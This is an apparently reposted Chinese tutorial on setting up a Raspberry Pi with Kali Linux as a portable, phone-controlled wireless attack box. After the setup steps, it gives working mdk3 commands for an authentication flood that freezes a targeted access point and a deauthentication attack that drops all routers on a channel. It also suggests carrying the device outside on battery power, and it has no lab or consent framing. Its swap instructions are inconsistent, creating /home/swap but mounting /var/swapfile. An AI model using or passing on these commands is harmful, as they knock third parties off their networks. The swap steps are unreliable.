手机利用树莓派进行无线攻击


内存卡8G以上

树莓派3B+/4B

镜像下载

https://www.offensive-security.com/kali-linux-arm-images/ 中,找到RaspberryPi Foundation

 

 

 

 

工具:Win32DiskImager

 

 

写入,然后等待

 

 

之后会弹出让你格式化,点取消不用管!

 

准备有快屏幕,一条HDMI线,鼠标 键盘

进系统配置

 

系统初始账户root 密码 toor

 

 

 

 

 进入桌面使用默认设置

修改国内源

leafpad /etc/apt/sources.list

试了几个源,国内个人觉得阿里云比较快

#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

换完源,更新

apt-get update

 

设置开机自动连接某个热点

目的为了树莓派开机自动连上手机,

在根目录放置一个文件名为wpa_supplicant.conf的文件,内容如下:

country=GB

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev

update_config=1

network={

ssid=""   //你的Wifi名称,注意大小写

psk=""  //你的Wifi密码

}

把SD卡插回树莓派,开机。

实际上树莓派的第一无线只连上过一个wifi,下次也只连上这个wifi

 

 

配置静态IP (知道什么IP方便SSH链接)

 

 

vi /etc/dhcpcd.conf

 

# 使用 vi 编辑文件,增加下列配置项

 

 

# 指定接口 eth0 或者wlan0

 

interface wlan0

 

# 指定静态IP,/24表示子网掩码为 255.255.255.0

 

static ip_address=192.168.1.20/24

 

# 路由器/网关IP地址

 

static routers=192.168.1.1

 

# 手动自定义DNS服务器

 

static domain_name_servers=114.114.114.114

 

按Esc :wq     保存退出

 

 

 

 

配置虚拟内存  (可设 可不设,因为树莓派3B+ RAM是1G,运行metasploit可能会出现内存不足导致的错误)

free -m 查看内存容量

 

创建虚拟内存交换文件

 dd  if=/dev/zero  of=/home/swap  bs=1024  count=2048k

对交换文件格式化并转换为swap分区:

mkswap /home/swap

挂载并激活分区:

swapon /home/swap

执行以上命令可能会出现:“不安全的权限 0644,建议使用 0600”类似提示,不要紧张,实际上已经激活了,可以忽略提示,也可以听从系统的建议修改下权限:

chmod -R 0600 /home/swap

这时候可以用 free -h 或 swapon -s命令查看新swap分区是否正常添加并激活使用。

修改 fstab 配置,设置开机自动挂载该分区:

 vim    /etc/fstab

在fstab文件末尾追加如下内容后:wq!保存即可:

/var/swapfile   swap  swap  defaults  0  0

直接对fstab进行echo追加:

echo  "/var/swapfile   swap  swap  defaults  0  0" >>  /etc/fstab

 

尝试一次无线攻击,使用KALI自带的MDK3

 

这里需要准备第二网卡,因为第一网卡用来连接SSH,攻击需要设置监听,第一网卡设置监听SSH会断,第二网卡最好用LINUX免驱 省事

手机下载Juice SSH来连接树莓派,需要图形界面就下载VNC Viewer

 

第二网卡一般默认叫wlan1,第一网卡则是wlan0,具体可以用 ifconfig 命令查看

 

启动网卡监听模式

airmon-ng start wlan1

扫描附近wifi

airodump-ng wlan1mon

 

验证洪水攻击 / Authentication Flood Attack

-a 后面的参数为AP的热点MAC:

mdk3 wlan1mon a -a 92:F0:52:02:B0:7A

这条命令会循环发送大量验证信息给AP,过不了几分钟,AP就会卡死, 如果路由器有防DOS的功能的话,这个不好用

 

攻击指定的频道, 让频道为 11 的路由掉线,注意自己的频道,别把自己打了

mdk3 wlan1mon d -c 11

 

在本地创建whitelist.txt白名单,里面写上不被攻击的MAC地址,那么这个地址就不会被攻击

mdk3 wlan1mon d -c 11 -w "whitelist.txt"

 

 

 

 

 

 

 使用移动电源进行树莓派供电,可以外带出门

 

 

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM